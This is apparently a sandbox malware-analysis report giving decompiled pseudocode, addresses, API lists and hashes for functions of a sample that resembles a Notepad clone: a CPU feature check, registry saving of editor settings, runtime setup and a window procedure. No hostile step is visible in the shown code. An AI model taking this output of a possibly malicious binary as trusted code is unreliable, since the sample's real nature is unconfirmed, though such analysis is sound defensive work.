				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x415c64 =  *0x415c64 & 0x00000000;
				 *0x415030 =  *0x415030 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x415c68; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x415c68 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x415030; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x415c64 = 1;
					 *0x415030 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x415c64 = 2;
						 *0x415030 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x415030; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x415c64 = 3;
								 *0x415030 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x415c64 = 5;
									 *0x415030 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x415030 =  *0x415030 | 0x00000040;
										 *0x415c64 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x415c68; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x415c68 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}






























                    0x0040207b
                    0x0040207e
                    0x00402088
                    0x00402099
                    0x0040224b
                    0x0040224e
                    0x0040224e
                    0x0040209f
                    0x004020a5
                    0x004020aa
                    0x004020ae
                    0x004020b2
                    0x004020b4
                    0x004020b6
                    0x004020b9
                    0x004020be
                    0x004020c7
                    0x004020d8
                    0x004020e3
                    0x004020e9
                    0x004020ea
                    0x004020f0
                    0x004020f3
                    0x004020fd
                    0x00402100
                    0x00402103
                    0x00402106
                    0x0040214b
                    0x0040214b
                    0x00402151
                    0x00402151
                    0x00402156
                    0x00402157
                    0x0040215d
                    0x0040218f
                    0x0040215f
                    0x00402161
                    0x00402162
                    0x00402168
                    0x0040216b
                    0x0040216d
                    0x00402170
                    0x00402173
                    0x00402176
                    0x00402179
                    0x00402182
                    0x00402187
                    0x00402187
                    0x00402182
                    0x00402192
                    0x00402197
                    0x0040219a
                    0x004021a4
                    0x004021af
                    0x004021b5
                    0x004021b8
                    0x004021c2
                    0x004021cd
                    0x004021d9
                    0x004021dc
                    0x004021df
                    0x004021ea
                    0x004021ef
                    0x004021f1
                    0x004021f6
                    0x004021f9
                    0x00402203
                    0x0040220b
                    0x00402210
                    0x0040221a
                    0x00402228
                    0x0040223b
                    0x00402242
                    0x00402242
                    0x00402228
                    0x0040220b
                    0x004021ef
                    0x004021cd
                    0x00000000
                    0x0040224a
                    0x0040210b
                    0x00402115
                    0x0040213a
                    0x00402140
                    0x00402143
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00402091
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID:
                    • API String ID: 2325560087-0
                    • Opcode ID: aff1236686487d6b46e9e8e0c19cb1fcae2ccfbf7df8aebfde6a1c09ffe72525
                    • Instruction ID: f4e6d6712146c31b67f0ac610b88ab6e8419e367a2555085ce8b4d0adaa77c0e
                    • Opcode Fuzzy Hash: aff1236686487d6b46e9e8e0c19cb1fcae2ccfbf7df8aebfde6a1c09ffe72525
                    • Instruction Fuzzy Hash: F6515AB1911A15CBDB14CF94DAD97EABBF1FB88314F14857AC445EB3A0D3B89900CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281290 Relevance: 103.6, APIs: 32, Strings: 27, Instructions: 328registrystringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E00281290() {
				void* _v8;
				char _v12;
				char _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				struct _WINDOWPLACEMENT _v64;
				long _t80;
				int _t126;
				char _t173;
				char _t174;
				intOrPtr _t175;
				intOrPtr _t177;
				signed int _t194;

				_t80 = RegCreateKeyExW(0x80000001, L"Software\\Microsoft\\Notepad", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v20);
				if(_t80 == 0) {
					_v64.length = 0x2c;
					GetWindowPlacement( *0x2970e4,  &_v64);
					 *0x295f70 = _v28;
					 *0x295f68 = _v64.rcNormalPosition;
					 *0x295f74 = _v24;
					 *0x295f6c = _v32;
					_v12 =  *0x29715c;
					RegSetValueExW(_v8, L"fWrap", 0, 4,  &_v12, 4);
					_t173 =  *0x295f68; // 0x0
					_v12 = _t173;
					RegSetValueExW(_v8, L"iWindowPosX", 0, 4,  &_v12, 4);
					_t174 =  *0x295f6c; // 0x0
					_v12 = _t174;
					RegSetValueExW(_v8, L"iWindowPosY", 0, 4,  &_v12, 4);
					_t175 =  *0x295f70; // 0x0
					_v12 = _t175 -  *0x295f68;
					RegSetValueExW(_v8, L"iWindowPosDX", 0, 4,  &_v12, 4);
					_t177 =  *0x295f74; // 0x0
					_v12 = _t177 -  *0x295f6c;
					RegSetValueExW(_v8, L"iWindowPosDY", 0, 4,  &_v12, 4);
					_v12 =  *0x297117 & 0x000000ff;
					RegSetValueExW(_v8, L"lfCharSet", 0, 4,  &_v12, 4);
					_v12 =  *0x297119 & 0x000000ff;
					RegSetValueExW(_v8, L"lfClipPrecision", 0, 4,  &_v12, 4);
					_v12 =  *0x297108;
					RegSetValueExW(_v8, L"lfEscapement", 0, 4,  &_v12, 4);
					_v12 =  *0x297114 & 0x000000ff;
					RegSetValueExW(_v8, L"lfItalic", 0, 4,  &_v12, 4);
					_v12 =  *0x29710c;
					RegSetValueExW(_v8, L"lfOrientation", 0, 4,  &_v12, 4);
					_v12 =  *0x297118 & 0x000000ff;
					RegSetValueExW(_v8, L"lfOutPrecision", 0, 4,  &_v12, 4);
					_v12 =  *0x29711b & 0x000000ff;
					RegSetValueExW(_v8, L"lfPitchAndFamily", 0, 4,  &_v12, 4);
					_v12 =  *0x29711a & 0x000000ff;
					RegSetValueExW(_v8, L"lfQuality", 0, 4,  &_v12, 4);
					_v12 =  *0x297116 & 0x000000ff;
					RegSetValueExW(_v8, L"lfStrikeOut", 0, 4,  &_v12, 4);
					_v12 =  *0x297115 & 0x000000ff;
					RegSetValueExW(_v8, L"lfUnderline", 0, 4,  &_v12, 4);
					_v12 =  *0x297110;
					RegSetValueExW(_v8, L"lfWeight", 0, 4,  &_v12, 4);
					_v12 =  *0x297e50;
					RegSetValueExW(_v8, L"iMarginTop", 0, 4,  &_v12, 4);
					_v12 =  *0x297e54;
					RegSetValueExW(_v8, L"iMarginBottom", 0, 4,  &_v12, 4);
					_v12 =  *0x297e58;
					RegSetValueExW(_v8, L"iMarginLeft", 0, 4,  &_v12, 4);
					_v12 =  *0x297e5c;
					RegSetValueExW(_v8, L"iMarginRight", 0, 4,  &_v12, 4);
					_t194 =  *0x2970f8;
					_v12 = _t194;
					RegSetValueExW(_v8, L"bStatusBar", 0, 4,  &_v12, 4);
					_t126 = E00281020();
					asm("cdq");
					_v16 = MulDiv(( *0x297100 ^ _t194) - _t194, 0x2d0, _t126);
					RegSetValueExW(_v8, L"iPointSize", 0, 4,  &_v16, 4);
					RegSetValueExW(_v8, L"lfFaceName", 0, 1, 0x29711c, lstrlenW(0x29711c) + _t133);
					RegSetValueExW(_v8, L"szHeader", 0, 1, 0x297e60, lstrlenW(0x297e60) + _t136);
					RegSetValueExW(_v8, L"szTrailer", 0, 1, 0x298068, lstrlenW(0x298068) + _t139);
					return RegCloseKey(_v8);
				}
				return _t80;
			}


















                    0x002812b5
                    0x002812bd
                    0x002812cf
                    0x002812d6
                    0x002812ed
                    0x002812f8
                    0x00281303
                    0x0028130c
                    0x0028131e
                    0x00281321
                    0x00281326
                    0x0028133c
                    0x0028133f
                    0x00281344
                    0x0028135a
                    0x0028135d
                    0x0028135f
                    0x0028137e
                    0x00281381
                    0x00281383
                    0x002813a2
                    0x002813a5
                    0x002813b6
                    0x002813c4
                    0x002813e0
                    0x002813e3
                    0x002813fe
                    0x00281401
                    0x0028141d
                    0x00281420
                    0x0028143b
                    0x0028143e
                    0x0028145a
                    0x0028145d
                    0x00281479
                    0x0028147c
                    0x00281498
                    0x0028149b
                    0x002814b7
                    0x002814ba
                    0x002814d6
                    0x002814d9
                    0x002814f4
                    0x002814f7
                    0x00281512
                    0x00281515
                    0x00281530
                    0x00281533
                    0x0028154e
                    0x00281551
                    0x0028156c
                    0x0028156f
                    0x00281571
                    0x00281577
                    0x0028158d
                    0x0028158f
                    0x0028159a
                    0x002815b5
                    0x002815c1
                    0x002815e5
                    0x00281603
                    0x00281621
                    0x00000000
                    0x0028162e
                    0x00281632

                    APIs
                    • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Notepad,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 002812B5
                    • GetWindowPlacement.USER32(?,?), ref: 002812D6
                    • RegSetValueExW.ADVAPI32(?,fWrap,00000000,00000004,?,00000004), ref: 00281321
                    • RegSetValueExW.ADVAPI32(?,iWindowPosX,00000000,00000004,?,00000004), ref: 0028133F
                    • RegSetValueExW.ADVAPI32(?,iWindowPosY,00000000,00000004,?,00000004), ref: 0028135D
                    • RegSetValueExW.ADVAPI32(?,iWindowPosDX,00000000,00000004,?,00000004), ref: 00281381
                    • RegSetValueExW.ADVAPI32(?,iWindowPosDY,00000000,00000004,?,00000004), ref: 002813A5
                    • RegSetValueExW.ADVAPI32(?,lfCharSet,00000000,00000004,?,00000004), ref: 002813C4
                    • RegSetValueExW.ADVAPI32(?,lfClipPrecision,00000000,00000004,?,00000004), ref: 002813E3
                    • RegSetValueExW.ADVAPI32(?,lfEscapement,00000000,00000004,?,00000004), ref: 00281401
                    • RegSetValueExW.ADVAPI32(?,lfItalic,00000000,00000004,?,00000004), ref: 00281420
                    • RegSetValueExW.ADVAPI32(?,lfOrientation,00000000,00000004,?,00000004), ref: 0028143E
                    • RegSetValueExW.ADVAPI32(?,lfOutPrecision,00000000,00000004,?,00000004), ref: 0028145D
                    • RegSetValueExW.ADVAPI32(?,lfPitchAndFamily,00000000,00000004,?,00000004), ref: 0028147C
                    • RegSetValueExW.ADVAPI32(?,lfQuality,00000000,00000004,?,00000004), ref: 0028149B
                    • RegSetValueExW.ADVAPI32(?,lfStrikeOut,00000000,00000004,?,00000004), ref: 002814BA
                    • RegSetValueExW.ADVAPI32(?,lfUnderline,00000000,00000004,?,00000004), ref: 002814D9
                    • RegSetValueExW.ADVAPI32(?,lfWeight,00000000,00000004,?,00000004), ref: 002814F7
                    • RegSetValueExW.ADVAPI32(?,iMarginTop,00000000,00000004,?,00000004), ref: 00281515
                    • RegSetValueExW.ADVAPI32(?,iMarginBottom,00000000,00000004,?,00000004), ref: 00281533
                    • RegSetValueExW.ADVAPI32(?,iMarginLeft,00000000,00000004,?,00000004), ref: 00281551
                    • RegSetValueExW.ADVAPI32(?,iMarginRight,00000000,00000004,?,00000004), ref: 0028156F
                    • RegSetValueExW.ADVAPI32(?,bStatusBar,00000000,00000004,?,00000004), ref: 0028158D
                      • Part of subcall function 00281020: RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 0028103A
                      • Part of subcall function 00281020: RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,00281594,?,?,?,00281594), ref: 00281062
                      • Part of subcall function 00281020: RegCloseKey.ADVAPI32(?,?,00281594), ref: 0028107F
                    • MulDiv.KERNEL32(?,000002D0,00000000), ref: 002815A5
                    • RegSetValueExW.ADVAPI32(?,iPointSize,00000000,00000004,?,00000004), ref: 002815C1
                    • lstrlenW.KERNEL32(0029711C), ref: 002815CE
                    • RegSetValueExW.ADVAPI32(?,lfFaceName,00000000,00000001,0029711C,00000000), ref: 002815E5
                    • lstrlenW.KERNEL32(00297E60), ref: 002815EC
                    • RegSetValueExW.ADVAPI32(?,szHeader,00000000,00000001,00297E60,00000000), ref: 00281603
                    • lstrlenW.KERNEL32(00298068), ref: 0028160A
                    • RegSetValueExW.ADVAPI32(?,szTrailer,00000000,00000001,00298068,00000000), ref: 00281621
                    • RegCloseKey.ADVAPI32(?), ref: 00281627
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Value$lstrlen$Close$CreateOpenPlacementQueryWindow
                    • String ID: ,$Software\Microsoft\Notepad$bStatusBar$fWrap$iMarginBottom$iMarginLeft$iMarginRight$iMarginTop$iPointSize$iWindowPosDX$iWindowPosDY$iWindowPosX$iWindowPosY$lfCharSet$lfClipPrecision$lfEscapement$lfFaceName$lfItalic$lfOrientation$lfOutPrecision$lfPitchAndFamily$lfQuality$lfStrikeOut$lfUnderline$lfWeight$szHeader$szTrailer
                    • API String ID: 3965342766-4088090211
                    • Opcode ID: 5c25994bed4de11f2da9cafca366b3f1efb379ee3a690d8ad69aecacce761416
                    • Instruction ID: 7683da5cacc04de4b6a450b4fe93bf3db442fa3ee8cca3673ad3d0b9cb0cef88
                    • Opcode Fuzzy Hash: 5c25994bed4de11f2da9cafca366b3f1efb379ee3a690d8ad69aecacce761416
                    • Instruction Fuzzy Hash: B5C140B5BA431CBFEB14DB94DC86FAD7BB9AB49B00F104156B700B72D0C6B06A54CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00286A51 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 62%
                    			E00286A51(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x295a5c = GetProcAddress(_t35, "FlsAlloc");
					 *0x295a60 = GetProcAddress(_t35, "FlsGetValue");
					 *0x295a64 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x295a5c;
					_t39 = TlsSetValue;
					 *0x295a68 = _t7;
					if( *0x295a5c == 0) {
						L6:
						 *0x295a60 = TlsGetValue;
						 *0x295a5c = E00286761;
						 *0x295a64 = _t39;
						 *0x295a68 = TlsFree;
					} else {
						__eflags =  *0x295a60;
						if( *0x295a60 == 0) {
							goto L6;
						} else {
							__eflags =  *0x295a64;
							if( *0x295a64 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x294544 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x295a60);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00285DA0();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x295a5c);
							 *0x295a5c = _t14;
							_t15 =  *_t41( *0x295a60);
							 *0x295a60 = _t15;
							_t16 =  *_t41( *0x295a64);
							 *0x295a64 = _t16;
							 *0x295a68 =  *_t41( *0x295a68);
							_t18 = E00286E3A();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E0028679E();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0x295a5c, E00286922);
								 *0x294540 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E00286CCA(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x295a64,  *0x294540, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E002867DB(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E0028679E();
					return 0;
				}
			}





















                    0x00286a51
                    0x00286a5f
                    0x00286a63
                    0x00286a83
                    0x00286a90
                    0x00286a9d
                    0x00286aa2
                    0x00286aa4
                    0x00286aab
                    0x00286ab1
                    0x00286ab6
                    0x00286ace
                    0x00286ad3
                    0x00286add
                    0x00286ae7
                    0x00286aed
                    0x00286ab8
                    0x00286ab8
                    0x00286abf
                    0x00000000
                    0x00286ac1
                    0x00286ac1
                    0x00286ac8
                    0x00000000
                    0x00286aca
                    0x00286aca
                    0x00286acc
                    0x00000000
                    0x00000000
                    0x00286acc
                    0x00286ac8
                    0x00286abf
                    0x00286af2
                    0x00286af8
                    0x00286afd
                    0x00286b00
                    0x00286bc7
                    0x00286bc7
                    0x00286bc7
                    0x00286b06
                    0x00286b0d
                    0x00286b0f
                    0x00286b11
                    0x00000000
                    0x00286b17
                    0x00286b17
                    0x00286b22
                    0x00286b28
                    0x00286b30
                    0x00286b35
                    0x00286b3d
                    0x00286b42
                    0x00286b4a
                    0x00286b51
                    0x00286b56
                    0x00286b5b
                    0x00286b5d
                    0x00286bc2
                    0x00286bc2
                    0x00000000
                    0x00286b5f
                    0x00286b5f
                    0x00286b72
                    0x00286b74
                    0x00286b79
                    0x00286b7c
                    0x00000000
                    0x00286b7e
                    0x00286b8a
                    0x00286b8e
                    0x00286b90
                    0x00000000
                    0x00286b92
                    0x00286ba3
                    0x00286ba5
                    0x00000000
                    0x00286ba7
                    0x00286ba7
                    0x00286ba9
                    0x00286baa
                    0x00286bb1
                    0x00286bb7
                    0x00286bbb
                    0x00286bbf
                    0x00286bbf
                    0x00286ba5
                    0x00286b90
                    0x00286b7c
                    0x00286b5d
                    0x00286b11
                    0x00286bcb
                    0x00286a65
                    0x00286a65
                    0x00286a6d
                    0x00286a6d

                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0028348E), ref: 00286A59
                    • __mtterm.LIBCMT ref: 00286A65
                      • Part of subcall function 0028679E: DecodePointer.KERNEL32(FFFFFFFF,00286BC7,?,0028348E), ref: 002867AF
                      • Part of subcall function 0028679E: TlsFree.KERNEL32(FFFFFFFF,00286BC7,?,0028348E), ref: 002867C9
                      • Part of subcall function 0028679E: DeleteCriticalSection.KERNEL32(00000000,00000000,00012E6A,?,00286BC7,?,0028348E), ref: 00286EA1
                      • Part of subcall function 0028679E: _free.LIBCMT ref: 00286EA4
                      • Part of subcall function 0028679E: DeleteCriticalSection.KERNEL32(FFFFFFFF,00012E6A,?,00286BC7,?,0028348E), ref: 00286ECB
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00286A7B
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00286A88
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00286A95
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00286AA2
                    • TlsAlloc.KERNEL32(?,0028348E), ref: 00286AF2
                    • TlsSetValue.KERNEL32(00000000,?,0028348E), ref: 00286B0D
                    • __init_pointers.LIBCMT ref: 00286B17
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B28
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B35
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B42
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B4F
                    • DecodePointer.KERNEL32(00286922,?,0028348E), ref: 00286B70
                    • __calloc_crt.LIBCMT ref: 00286B85
                    • DecodePointer.KERNEL32(00000000,?,0028348E), ref: 00286B9F
                    • GetCurrentThreadId.KERNEL32 ref: 00286BB1
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                    • API String ID: 3698121176-3819984048
                    • Opcode ID: 0968ed3b8e95abebff921932b3ff1c6de50f95390b2de25a8d4303b419b4d934
                    • Instruction ID: 806961e2b0e1b2a503bf1dd311f57dede3cff168ecaa759e9c7d1cdb5a234e0a
                    • Opcode Fuzzy Hash: 0968ed3b8e95abebff921932b3ff1c6de50f95390b2de25a8d4303b419b4d934
                    • Instruction Fuzzy Hash: 97318035A227259FDB127FB4BC8DA193BE5EB05724B180617E404E36F0D7748961CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00282340 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 247windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 79%
                    			E00282340(struct HWND__* _a4, int _a8, int _a12, unsigned int _a16) {
				short _v524;
				struct tagRECT _v540;
				void* __edi;
				void* __esi;
				int _t35;
				struct HWND__* _t43;
				struct HWND__* _t48;
				void* _t81;
				signed int _t86;
				void* _t122;
				signed int _t136;
				void* _t138;

				_t35 = _a8;
				_t138 = (_t136 & 0xfffffff8) - 0x21c;
				if(_t35 != ( *0x295f64 & 0x0000ffff)) {
					__eflags = _t35 - 0x10;
					if(__eflags > 0) {
						__eflags = _t35 - 0x117;
						if(__eflags > 0) {
							__eflags = _t35 - 0x233;
							if(_t35 == 0x233) {
								_t122 = _a12;
								DragQueryFileW(_t122, 0,  &_v524, 0x41);
								DragFinish(_t122);
								 *0x280000( &_v524, 0xffffffff);
								goto L33;
							} else {
								__eflags = _t35 - 0x307;
								if(_t35 == 0x307) {
									goto L33;
								} else {
									goto L31;
								}
							}
						} else {
							if(__eflags == 0) {
								E00281F50(_a12);
								__eflags = 0;
								return 0;
							} else {
								__eflags = _t35 - 0x11;
								if(_t35 == 0x11) {
									_t43 =  *0x280000();
									__eflags = _t43;
									if(_t43 == 0) {
										goto L33;
									} else {
										return 1;
									}
								} else {
									__eflags = _t35 - 0x111;
									if(_t35 != 0x111) {
										goto L31;
									} else {
										E00281C40(_a12 & 0x0000ffff);
										__eflags = 0;
										return 0;
									}
								}
							}
						}
					} else {
						if(__eflags == 0) {
							_t48 =  *0x280000();
							__eflags = _t48;
							if(_t48 == 0) {
								goto L33;
							} else {
								DestroyWindow(_a4);
								__eflags = 0;
								return 0;
							}
						} else {
							_t86 = _t35 - 1;
							__eflags = _t86 - 6;
							if(_t86 > 6) {
								L31:
								return DefWindowProcW(_a4, _t35, _a12, _a16);
							} else {
								switch( *((intOrPtr*)(_t86 * 4 +  &M002825F4))) {
									case 0:
										_t130 = _a4;
										_t107 = 0x50a00144;
										GetClientRect(_t130,  &_v540);
										__eflags =  *0x29715c;
										if( *0x29715c == 0) {
											_t107 = 0x50b001c4;
										}
										 *0x2970ec = CreateWindowExW(0x200, L"edit", 0, _t107, 0, 0, _v540.right, _v540.bottom, _t130, 0,  *0x2970e0, 0);
										_t55 = CreateFontIndirectW(0x297100);
										 *0x2970f0 = _t55;
										SendMessageW( *0x2970ec, 0x30, _t55, 0);
										SendMessageW( *0x2970ec, 0xc5, 0, 0);
										 *0x2970f4 = CreateWindowExW(0, "jnj", 0, 0x50000000, 0, 0, 0, "jjjjh", _t130, 0,  *0x2970e0, 0);
										_t62 = LoadStringW( *0x2970e0, 0x206, 0x2970fc, 0) | 0xffffffff;
										 *0x298274 = _t62;
										 *0x298278 = _t62;
										E00281090();
										__eflags = 0;
										return 0;
										goto L34;
									case 1:
										__eax = E00281290();
										PostQuitMessage(0);
										__eax = 0;
										__eflags = 0;
										_pop(__edi);
										_pop(__esi);
										return 0;
										goto L34;
									case 2:
										goto L31;
									case 3:
										__eax = _a16;
										_a16 >> 0x10 = E00281230(_a16 >> 0x10, __cx & 0x0000ffff);
										__eax = 0;
										__eflags = 0;
										_pop(__edi);
										_pop(__esi);
										return 0;
										goto L34;
									case 4:
										SetFocus( *0x2970ec) = 0;
										__eflags = 0;
										_pop(__edi);
										_pop(__esi);
										return 0;
										goto L34;
								}
							}
						}
					}
				} else {
					_t81 = _a16;
					if(( *(_t81 + 0xc) & 0x00000040) != 0) {
						 *0x2970e8 = 0;
					}
					if(( *(_t81 + 0xc) & 0x00000008) != 0) {
						memcpy(0x2982a4, _t81, 0xa << 2);
						_t138 = _t138 + 0xc;
						E00281FF0(_t81);
					}
					if(( *(_t81 + 0xc) & 0x00000010) != 0) {
						memcpy(0x2982a4, _t81, 0xa << 2);
						_t138 = _t138 + 0xc;
						E00282130(_t81);
					}
					if(( *(_t81 + 0xc) & 0x00000020) == 0) {
						L33:
						__eflags = 0;
						return 0;
					} else {
						memcpy(0x2982a4, _t81, 0xa << 2);
						E00282200(_t81);
						return 0;
					}
				}
				L34:
			}















                    0x0028234d
                    0x00282350
                    0x0028235b
                    0x002823ce
                    0x002823d1
                    0x00282544
                    0x00282549
                    0x00282598
                    0x0028259d
                    0x002825c2
                    0x002825cf
                    0x002825d6
                    0x002825e3
                    0x00000000
                    0x0028259f
                    0x0028259f
                    0x002825a4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x002825a4
                    0x0028254b
                    0x0028254b
                    0x00282588
                    0x0028258d
                    0x00282595
                    0x0028254d
                    0x0028254d
                    0x00282550
                    0x0028256d
                    0x00282573
                    0x00282575
                    0x00000000
                    0x00282577
                    0x00282582
                    0x00282582
                    0x00282552
                    0x00282552
                    0x00282557
                    0x00000000
                    0x00282559
                    0x0028255d
                    0x00282562
                    0x0028256a
                    0x0028256a
                    0x00282557
                    0x00282550
                    0x0028254b
                    0x002823d7
                    0x002823d7
                    0x00282521
                    0x00282527
                    0x00282529
                    0x00000000
                    0x0028252f
                    0x00282533
                    0x00282539
                    0x00282541
                    0x00282541
                    0x002823dd
                    0x002823dd
                    0x002823e0
                    0x002823e3
                    0x002825a6
                    0x002825bf
                    0x002823e9
                    0x002823e9
                    0x00000000
                    0x002823f0
                    0x002823f9
                    0x002823fe
                    0x00282404
                    0x0028240b
                    0x0028240d
                    0x0028240d
                    0x00282445
                    0x0028244a
                    0x00282459
                    0x00282466
                    0x00282478
                    0x002824a2
                    0x002824b8
                    0x002824bb
                    0x002824c0
                    0x002824c5
                    0x002824ca
                    0x002824d2
                    0x00000000
                    0x00000000
                    0x002824d5
                    0x002824dc
                    0x002824e2
                    0x002824e2
                    0x002824e4
                    0x002824e5
